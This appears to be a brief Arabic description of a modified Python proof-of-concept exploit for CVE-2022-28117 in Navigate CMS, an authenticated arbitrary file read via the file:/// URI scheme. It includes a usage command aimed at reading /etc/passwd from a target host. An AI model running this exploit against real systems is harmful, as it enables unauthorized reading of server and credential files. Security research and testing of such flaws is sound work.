
استغلال إثبات المفهوم لـ CVE-2022-28117 يتيح قراءة ملفات عشوائية عبر مخطط URI file:/// في Navigate CMS، مع دعم المصادقة.
برنامج PoC بلغة Python معدّل قليلاً
الاستخدام: python3 .\poccve2022-28117.py -x file:///etc/passwd -u [username] -p [password] http://192.168.148.140/navigate